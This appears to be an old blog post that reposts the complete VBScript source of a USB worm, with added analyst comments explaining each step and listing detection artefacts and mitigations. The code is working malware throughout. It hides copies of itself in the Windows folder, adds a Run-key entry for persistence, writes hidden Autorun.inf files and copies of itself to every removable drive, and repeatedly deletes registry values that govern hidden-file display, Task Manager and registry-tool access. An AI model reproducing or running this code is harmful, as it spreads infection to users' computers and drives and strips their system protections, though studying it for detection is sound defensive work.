
Monday, February 28, 2011

ACERS-SYPE-COMET-SOFEE-ACES virus

I got this code from the virus named in the title a long time ago. It was stuck on my previous Blogger account, so I couldn't edit it.

Anyway here is the code reposted from

' ---------------------------------------------------------------------------
' Analyst notes (added for readers studying this sample; code is unchanged).
'
' What the script does, as visible below:
'   1. Reads its own source text and writes a copy into the Windows folder.
'   2. Registers that copy under the HKLM ...\CurrentVersion\Run key (value
'      name "autoMe") so it is started by wscript.exe at logon.
'   3. Loops forever (10 s sleep per pass), writing an Autorun.inf plus a copy
'      of itself to every removable drive it sees.
'   4. On every pass, deletes several per-user Explorer/policy registry values.
'
' Host artefacts a responder can look for (all taken from the literals below):
'   - <Windows folder>\ACERS-SYPE-COMET-SOFEE-ACES.vbs, attributes 39
'   - Run value "autoMe" pointing at wscript.exe and that file
'   - Autorun.inf + the .vbs in the root of removable drives, attributes 39
'   - a long-running wscript.exe process
'
' Mitigation pointers: disabling AutoRun for removable media through
' machine-wide policy and restricting Windows Script Host both cut off the
' launch paths this script relies on. Note the script only deletes values
' under HKEY_CURRENT_USER; it does not touch HKEY_LOCAL_MACHINE policy values.
' ---------------------------------------------------------------------------

' Every runtime error is silently ignored from here on (missing files,
' access-denied on registry or disk writes, and so on).
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

' GetSpecialFolder(0) is the Windows folder; tf is the full path of the
' running script; x is a lower-cased copy of that path.
win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

' Mid(x, 4) drops the first three characters (e.g. "e:\"), so this compares
' the rest of the path with the bare file name, i.e. "running from a drive
' root". If so, an Explorer window is opened on that drive.
' NOTE(analysis): x was lower-cased above while the literal is mixed-case, so
' with VBScript's case-sensitive "=" this branch looks unreachable as written.
If Mid(x, 4) = "ACERS-SYPE-COMET-SOFEE-ACES.vbs" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

' Read the script's own source, line by line, into scrText (mode 1 = ForReading).
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop

' Remember whether a copy already existed in the Windows folder before this run.
ax = fso.FileExists(win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs")

' (Re)write the copy in the Windows folder, overwriting any existing file.
Set myFile = fso.CreateTextFile(win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs", true)
myFile.write scrText
myFile.close

' 39 = ReadOnly(1) + Hidden(2) + System(4) + Archive(32): the copy will not
' show in Explorer under default view settings.
Set fAttr = fso.Getfile(win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs")
fAttr.Attributes=39

' Persistence: Run-key value "autoMe" under HKLM. Writing here normally needs
' administrative rights; a failure is hidden by On Error Resume Next.
wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs"""

' If no copy existed before this run, start the Windows-folder copy now.
If ax = false Then wscr.Run "wscript.exe """ & win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs"""

' Main loop: never terminates on its own except via the WScript.Quit below.
While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives

' DriveType 1 = removable; drive A: is skipped.
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then
' Any existing Autorun.inf is reset to attribute 32 (Archive only, which
' clears ReadOnly/Hidden/System) and force-deleted, so a protective or
' third-party Autorun.inf *file* is replaced.
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
End If
' New Autorun.inf: both the "open" entry and the default shell "Open" verb
' point at wscript.exe running the .vbs in the drive root.
Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
auFile.write "[autorun]" & vbCrLf & "open=wscript.exe ACERS-SYPE-COMET-SOFEE-ACES.vbs" & vbCrLf & "shell\Open\Command=wscript.exe ACERS-SYPE-COMET-SOFEE-ACES.vbs" & vbCrLf & "shell\Open\Default=1"
auFile.close

' Hide the Autorun.inf (ReadOnly + Hidden + System + Archive).
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=39

' Write the script copy to the drive root and hide it the same way.
Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs")
fAttr.Attributes=39
End If
Next

' Deletes per-user (HKCU) values on every pass. Removing Hidden, HideFileExt
' and ShowSuperHidden discards the user's Explorer view choices, and removing
' NoDriveTypeAutoRun discards a per-user AutoRun restriction.
' NOTE(analysis): the purpose of also deleting NoFolderOptions,
' DisableRegistryTools and DisableTaskMgr is not evident from this code.
' For detection, repeated deletion of these values by wscript.exe is a
' usable behavioural signal.
With wscr
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")
.RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools")
.RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr")
End With

' An instance started from somewhere other than the Windows-folder copy exits
' once its own drive is no longer ready (e.g. the removable drive was pulled).
' The Windows-folder instance never takes this exit.
If tf <> win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If

' 10-second pause between passes.
WScript.Sleep 10000

Wend